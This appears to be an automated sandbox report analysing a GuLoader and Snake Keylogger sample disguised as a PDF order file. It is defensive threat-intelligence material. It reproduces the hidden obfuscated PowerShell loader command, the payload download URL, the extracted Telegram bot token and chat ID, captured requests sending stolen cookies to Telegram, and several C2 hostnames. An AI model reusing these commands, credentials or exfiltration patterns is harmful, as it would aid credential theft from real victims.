Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order requirements CIF Greece_pdf.exe

Overview

General Information

Sample name:Order requirements CIF Greece_pdf.exe
Analysis ID:1560036
MD5:998e394361bd54c58a1ad2092fca8b6c
SHA1:c68e7856324a50c04ee5e1de46952ecaed47eff7
SHA256:87f519d29ebc3fb1b6bed4a5e7ac4865b029da69d2608548a8db34e4069673ec
Tags:exeGuLoaderQuotationuser-cocaman
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Disables CMD prompt
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Order requirements CIF Greece_pdf.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe" MD5: 998E394361BD54C58A1AD2092FCA8B6C)
    • powershell.exe (PID: 7512 cmdline: powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 8044 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84", "Chat_id": "6897585916", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.2048865185.0000000009EB9000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: msiexec.exe PID: 8044JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.186.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8044, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ", CommandLine: powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", ParentImage: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe, ParentProcessId: 7472, ParentProcessName: Order requirements CIF Greece_pdf.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ", ProcessId: 7512, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:37:01.172336+010028033053Unknown Traffic192.168.2.449740188.114.96.3443TCP
            2024-11-21T10:37:17.561437+010028033053Unknown Traffic192.168.2.449782188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:36:56.775750+010028032742Potentially Bad Traffic192.168.2.449738132.226.247.7380TCP
            2024-11-21T10:36:59.510233+010028032742Potentially Bad Traffic192.168.2.449738132.226.247.7380TCP
            2024-11-21T10:37:02.650777+010028032742Potentially Bad Traffic192.168.2.449742132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:36:47.259837+010028032702Potentially Bad Traffic192.168.2.449736142.250.186.78443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84", "Chat_id": "6897585916", "Version": "4.4"}
            Source: msiexec.exe.8044.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendMessage"}
            Source: Order requirements CIF Greece_pdf.exeReversingLabs: Detection: 57%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: Order requirements CIF Greece_pdf.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EB300 CryptUnprotectData,6_2_236EB300
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EBA61 CryptUnprotectData,6_2_236EBA61
            Source: Order requirements CIF Greece_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49806 version: TLS 1.2
            Source: Order requirements CIF Greece_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2047558142.0000000008AB0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: re.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_00406448 FindFirstFileA,FindClose,0_2_00406448
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040589C
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EBDF0h6_2_236EBB20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EAA25h6_2_236EA6E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EFCBEh6_2_236EF9F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E5E21h6_2_236E5B78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E89F1h6_2_236E8748
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E2A01h6_2_236E2758
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E59C9h6_2_236E5720
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EE5EEh6_2_236EE320
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E25A9h6_2_236E2300
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E92A3h6_2_236E8FF8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov esp, ebp6_2_236EDBF9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E6279h6_2_236E5FD0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E8E49h6_2_236E8BA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E2E59h6_2_236E2BB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EEA7Eh6_2_236EE7B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E5119h6_2_236E4E70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E7CE9h6_2_236E7A40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E1CF9h6_2_236E1A50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EA0E1h6_2_236E9E38
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E4CC1h6_2_236E4A18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E8599h6_2_236E82F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E5571h6_2_236E52C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E2151h6_2_236E1EA8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E8141h6_2_236E7E98
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EA539h6_2_236EA290
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EE15Eh6_2_236EDE90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E4411h6_2_236E4168
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EF82Eh6_2_236EF560
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E0FF1h6_2_236E0D48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E3FB9h6_2_236E3D10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E7891h6_2_236E75E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E9C89h6_2_236E99E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E18A1h6_2_236E15F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E4869h6_2_236E45C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E1449h6_2_236E11A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E9831h6_2_236E9588
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E7439h6_2_236E7190
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E3709h6_2_236E3460
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E02E9h6_2_236E0040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EEF0Eh6_2_236EEC40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E32B1h6_2_236E3008
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov esp, ebp6_2_236EDC08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E0B99h6_2_236E08F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236EF39Eh6_2_236EF0D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E3B61h6_2_236E38B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 236E0741h6_2_236E0498

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b53820095deHost: api.telegram.orgContent-Length: 7045
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.186.78:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 188.114.96.3:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b53820095deHost: api.telegram.orgContent-Length: 7045
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Nov 2024 09:37:26 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000001.00000002.2042349403.0000000007890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microl
            Source: powershell.exe, 00000001.00000002.2042349403.000000000794B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros6
            Source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: Order requirements CIF Greece_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Order requirements CIF Greece_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2037160905.0000000005101000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
